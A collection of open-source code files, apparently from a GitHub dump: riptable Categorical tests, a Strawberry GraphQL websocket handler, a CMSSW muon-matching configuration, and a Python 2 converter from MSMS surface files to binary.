FA([True, True, True]),
id='repeated_key_multikey_overlap2'
),
]
)
def test_multikey_categorical_isin(a, b, a_in_b, b_in_a):
assert_array_equal(a_in_b, a.isin(b))
assert_array_equal(b_in_a, b.isin(a))
# TODO this is a good candidate for a hypothesis test once the CategoricalStrategy is able to generate MultiKey Categoricals
f_msg = 'expected to be consistent with cat1.as_singlekey().isin(cat2.as_singlekey()) operation.'
assert_array_equal(a.as_singlekey().isin(b.as_singlekey()), a.isin(b), f_msg)
assert_array_equal(b.as_singlekey().isin(a.as_singlekey()), b.isin(a), f_msg)
_make_unique_test_cases = pytest.mark.parametrize('cat, expected', [
(rt.Cat([1, 1, 2, 2], ['a', 'a']), rt.Cat([1, 1, 1, 1], ['a'])),
(rt.Cat([2, 2, 2, 2], ['a', 'a']), rt.Cat([1, 1, 1, 1], ['a'])),
(rt.Cat([1, 2, 3, 3], ['a', 'a', 'b']), rt.Cat([1, 1, 2, 2], ['a', 'b'])),
(rt.Cat([0, 0, 1, 1], ['a', 'a'], base_index=0), rt.Cat([0, 0, 0, 0], ['a'], base_index=0)),
(rt.Cat([1, 1, 1, 1], ['a', 'a'], base_index=0), rt.Cat([0, 0, 0, 0], ['a'], base_index=0)),
(rt.Cat([0, 0, 1, 1], ['a', 'b'], base_index=0), rt.Cat([0, 0, 1, 1], ['a', 'b'], base_index=0)),
(rt.Cat([1, 1, 2, 2, 3], [99, 99, 101], ), rt.Cat([1, 1, 1, 1, 2], [99, 101])),
(rt.Cat([0, 0, 1, 1], [99, 99], base_index=0), rt.Cat([0, 0, 0, 0], [99], base_index=0)),
(rt.Cat([0, 0, 1, 1], [99, 101], base_index=0), rt.Cat([0, 0, 1, 1], [99, 101], base_index=0)),
(rt.Cat([0, 0, 1, 1, 2, 2], ['a', 'a'], ), rt.Cat([0, 0, 1, 1, 1, 1], ['a'], )),
(rt.Cat([0, 0, 1, 1, 2, 2, 3, 3], ['a', 'a', 'b'], ), rt.Cat([0, 0, 1, 1, 1, 1, 2, 2], ['a', 'b'], )),
])
@_make_unique_test_cases
def test_category_make_unique_not_inplace(cat, expected):
res = cat.category_make_unique()
assert (res == expected).all()
@pytest.mark.parametrize('base_index', [0, 1])
def test_category_make_unique_multikey(base_index):
c1 = Categorical(np.arange(10) % 2, ['a', 'a'], base_index=base_index)
c2 = Categorical(np.arange(10) % 3, ['a', 'b', 'c'], base_index=base_index)
cat = Categorical([c1, c2], base_index=base_index)
res = cat.category_make_unique()
assert list(cat) == list(res)
|
strawberry/fastapi/handlers/graphql_ws_handler.py | TheVinhLuong102/Strawberry | 2,062 | 12687262 | from typing import Any
from strawberry.asgi.handlers import GraphQLWSHandler as BaseGraphQLWSHandler
class GraphQLWSHandler(BaseGraphQLWSHandler):
async def get_context(self) -> Any:
return await self._get_context()
async def get_root_value(self) -> Any:
return await self._get_root_value()
|
PhysicsTools/PatAlgos/test/patTuple_addDecayInFlight_cfg.py | ckamtsikis/cmssw | 852 | 12687280 | <gh_stars>100-1000
## import skeleton process
from PhysicsTools.PatAlgos.patTemplate_cfg import *
#process.Tracer = cms.Service("Tracer")
# load the PAT config
process.load("PhysicsTools.PatAlgos.producersLayer1.patCandidates_cff")
patAlgosToolsTask.add(process.patCandidatesTask)
#Temporary customize to the unit tests that fail due to old input samples
process.patTaus.skipMissingTauID = True
process.load("PhysicsTools.PatAlgos.selectionLayer1.selectedPatCandidates_cff")
patAlgosToolsTask.add(process.selectedPatCandidatesTask)
## add inFlightMuons
process.load("SimGeneral.HepPDTESSource.pythiapdt_cfi")
process.inFlightMuons = cms.EDProducer("PATGenCandsFromSimTracksProducer",
src = cms.InputTag("g4SimHits"), ## use "fastSimProducer" for FastSim
setStatus = cms.int32(-1),
particleTypes = cms.vstring("mu+"), ## picks also mu-, of course
filter = cms.vstring("pt > 0.5"), ## just for testing
makeMotherLink = cms.bool(True),
writeAncestors = cms.bool(True), ## save also the intermediate GEANT ancestors of the muons
genParticles = cms.InputTag("genParticles"),
)
patAlgosToolsTask.add(process.inFlightMuons)
process.out.outputCommands.append('keep *_inFlightMuons_*_*')
## prepare several clones of match associations for status 1, 3 and in flight muons (status -1)
process.muMatch3 = process.muonMatch.clone(mcStatus = cms.vint32( 3))
patAlgosToolsTask.add(process.muMatch3)
process.muMatch1 = process.muonMatch.clone(mcStatus = cms.vint32( 1))
patAlgosToolsTask.add(process.muMatch1)
process.muMatchF = process.muonMatch.clone(mcStatus = cms.vint32(-1),matched = cms.InputTag("inFlightMuons"))
patAlgosToolsTask.add(process.muMatchF)
process.patMuons.genParticleMatch = cms.VInputTag(
cms.InputTag("muMatch3"),
cms.InputTag("muMatch1"),
cms.InputTag("muMatchF"),
)
## dump event content
process.content = cms.EDAnalyzer("EventContentAnalyzer")
## ------------------------------------------------------
# In addition you usually want to change the following
# parameters:
## ------------------------------------------------------
#
# process.GlobalTag.globaltag = ... ## (according to https://twiki.cern.ch/twiki/bin/view/CMS/SWGuideFrontierConditions)
# ##
## switch to RECO input
from PhysicsTools.PatAlgos.patInputFiles_cff import filesRelValTTbarGENSIMRECO
process.source.fileNames = filesRelValTTbarGENSIMRECO
# ##
process.maxEvents.input = 10
# ##
# process.out.outputCommands = [ ... ] ## (e.g. taken from PhysicsTools/PatAlgos/python/patEventContent_cff.py)
# ##
process.out.fileName = 'patTuple_addDecayInFlight.root'
# ##
# process.options.wantSummary = False ## (to suppress the long output at the end of the job)
|
scripts/msms2bin.py | CyrusBiotechnology/pv | 272 | 12687283 | #!/usr/bin/env python
"""
Converts the MSMS .vert/.face pair into a compact binary format optimized for
file size.
"""
import sys
import os
from struct import pack
def print_usage(code=0):
print 'usage: msm2bin.py <input> [output]'
print ' input may either point to the .vert or .face file generated by msms'
print ' when the output filename is omitted, it defaults to input.bin with'
print ' the file extension removed, e.g. surface.vert -> surface.bin'
sys.exit(code);
def exchange_extension(filename, new_ext):
return '%s.%s' % (os.path.splitext(filename)[0], new_ext)
def check_exists(filename):
if not os.path.exists(filename):
print '"%s" does not exists' % filename
return False
return True
def check_readable(filename):
if not check_exists(filename):
return False
if not os.access(filename, os.R_OK):
print '"%s" is not readable' % filename
return False
return True
def read_and_pack_vert(filename, out_fd):
with open(filename, 'rb') as verts:
header = True
data = bytes()
for line in verts:
line = line.strip()
if line.startswith('#'):
continue
if len(line) == 0:
continue
if header:
num_verts = int(line.split()[0])
out_fd.write(pack('!I', num_verts))
header = False
continue
x, y, z, nx, ny, nz = line.split()[:6]
data += pack('!ffffff', float(x), float(y), float(z),
float(nx), float(ny), float(nz))
out_fd.write(data)
def read_and_pack_faces(filename, out_fd):
with open(filename, 'rb') as faces:
header = True
data = bytes()
for line in faces:
line = line.strip()
if line.startswith('#'):
continue
if len(line) == 0:
continue
if header:
num_faces = int(line.split()[0])
out_fd.write(pack('!I', num_faces))
header = False
continue
idx0, idx1, idx2 = line.split()[:3]
data += pack('!III', int(idx0), int(idx1), int(idx2))
out_fd.write(data)
def main(args):
BIN_VERSION = 1
if len(args) < 2:
print_usage(-1)
vert_filename = exchange_extension(args[1], 'vert')
face_filename = exchange_extension(args[1], 'face')
output_filename = exchange_extension(args[1], 'bin')
if len(args) == 3:
output_filename = args[2]
if not check_readable(vert_filename) or not check_readable(face_filename):
sys.exit(-1)
with open(output_filename, 'wb') as out_file:
out_file = open(output_filename, 'wb')
out_file.write(pack('!I', BIN_VERSION))
read_and_pack_vert(vert_filename, out_file)
read_and_pack_faces(face_filename, out_file)
if __name__ == '__main__':
main(sys.argv)
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.